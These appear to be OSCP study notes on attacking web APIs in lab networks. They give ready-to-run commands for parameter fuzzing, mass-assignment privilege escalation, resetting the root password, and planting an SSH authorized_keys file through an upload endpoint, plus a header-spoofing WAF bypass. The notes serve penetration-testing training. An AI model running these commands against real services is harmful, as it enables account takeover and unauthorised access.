Apis
Notes from oscp.adot8.com — web applications.
APIs
Fuzzing APIs
01/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt01ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/login/v1?FUZZ=1 01ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/?FUZZ=1 {% hint style="info" %} Burp could also be used with Intruder + Sniper {% endhint %}
Rest APIs
APIs usually follow the format of /api_name/v1 , we can enumerate using a gobuster pattern
01gobuster dir -w directories.txt -p apis_patt.txt -u http://192.168.205.249:33414/ -t100Inspecting the API
<pre><code>curl -i http://192.168.205.249:33414/help <strong>curl http://192.168.205.249:33414/help | python -m json.tool </strong></code></pre>{% hint style="info" %} You should dir bust all api paths you find {% endhint %}
Posting to an API
curl -d '{"user":"admin", "password":"test"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/login/v1
curl -d '{"user":"admin", "password":"test", "admin":"True"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/register/v1
Example: Changing root account password
curl
'http://192.168.50.16:33414/user/v1/root/password'
-H 'Content-Type: application/json'
-H 'Authorization: OAuth eyJ0eXAiOiJKV1Q
-d '{"password": "adot8"}'
curl -X 'PUT'
'http://192.168.50.16:33414/users/v1/root/password'
-H 'Content-Type: application/json'
-H 'Authorization: OAuth eyJ0eXAiOiJKV1Q'
-d '{"password": "adot8"}'
Uploading Files
01curl http://192.168.205.249:33414/file-upload -i -L -X POST -H "Content-type: multipart/form-data" -F file="@$(pwd)/authorized_keys.txt" -F filename='/home/alfredo/.ssh/authorized_keys'WAF Bypass
Add the X-Forwarded-For: 127.0.0.1 header to the request.
01curl http://192.168.214.134:13337/logs -H 'X-Forwarded-For: 127.0.0.1'01X-Originating-IP: 127.0.0.102X-Forwarded-For: 127.0.0.103X-Remote-IP: 127.0.0.104X-Remote-Addr: 127.0.0.105X-Client-IP: 127.0.0.1